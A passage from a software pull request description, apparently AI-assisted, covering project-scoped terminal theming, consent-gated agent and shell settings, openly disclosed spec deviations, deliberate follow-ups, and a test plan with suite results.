- **Terminal theme/font** — project-scoped **live** rendering (see deviation), plus a panel theme Select over the real theme ids.

## Spec deviations (for ratification)

- **§4 terminal appearance:** the spec said "applied at creation; existing terminals keep theirs." There is no per-node appearance field in this app — appearance is a live global subscription — so the honest implementation is project-scoped live rendering: a project's *existing* terminals repaint when its theme/font changes. Recorded in code.
- **Trust vs the ungated precedent:** `agents`/`shell` are consent-gated while `defaultPermissionMode`/`defaultAgentId` are not — the former can name new code, the latter select from a closed set. Consistent with PR1's hash exclusions.

## Known follow-ups (deliberate)

Both new refusals (a reserved env key, a `${env:}` launchCmd) are silent to the settings author — the panel surface for skipped/refused values is the observability wave. Also riding: SSH `readSettings` amplification per `create()` (bounded, fail-open — measure on device); creation-time terminal seeding (mount flash before the live merge converges); trust-changed is projectId-keyed while grants are location-keyed (a sibling project on the same folder stays cold until its own refresh — one extra prompt, never a wrong grant); the panel unpaired-note under-covers an invalid/disabled `defaultAgentId`. Mac + live-SSH device verification owed.

## Test plan

- +147 tests over PR3's baseline (launch-info cache incl. timeout-retry + generation guard, family consent incl. single-flight and setup-flow-unchanged, launchCmd layering at every site + scope + literal-only, spawn env/shell precedence + the full reserved-key predicate + ssh staging, project-scoped visuals + mirror lifecycle). Reserved-key and merge-point cases are mutation-checked.
- Full suite: 7727 passed / 12 skipped; typecheck clean on both configs.

🤖 Generated with [Claude Code](https://claude.com/claude-code)